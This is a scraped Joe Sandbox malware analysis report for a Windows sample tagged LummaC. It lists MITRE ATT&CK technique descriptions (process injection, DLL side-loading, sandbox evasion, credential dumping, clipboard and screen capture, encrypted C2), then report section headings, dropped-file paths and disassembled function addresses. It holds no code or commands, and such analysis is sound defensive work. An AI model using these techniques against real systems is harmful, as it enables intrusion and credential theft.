Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\jsii-runtime.1844169201\bin\jsii-runtime.js

C:\Users\user\AppData\Local\Temp\jsii-runtime.1844169201\bin\jsii-runtime.js.map

C:\Users\user\AppData\Local\Temp\jsii-runtime.1844169201\lib\program.js

C:\Users\user\AppData\Local\Temp\jsii-runtime.1844169201\lib\program.js.map

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
file.exe

Function 0043A97E Relevance: 19.8, APIs: 9, Strings: 2, Instructions: 587
memoryCOMMON

Function 0040F970 Relevance: 15.3, Strings: 12, Instructions: 280
COMMON

Function 0043A2E0 Relevance: 11.6, Strings: 9, Instructions: 302
COMMON

Function 0041D5AF Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 404
encryptionCOMMON

Function 0042509D Relevance: 6.4, Strings: 5, Instructions: 163
COMMON

Function 00426F82 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 524
COMMON

Function 004359B7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Function 0042A6D0 Relevance: 2.8, Strings: 2, Instructions: 324
COMMON

Function 004100C5 Relevance: 2.7, Strings: 2, Instructions: 198
COMMON

Function 0040D0B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142
threadCOMMON

Function 00440CC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 79
memoryCOMMON

Function 00440F20 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Function 0040E1C0 Relevance: 1.6, APIs: 1, Instructions: 90
libraryCOMMON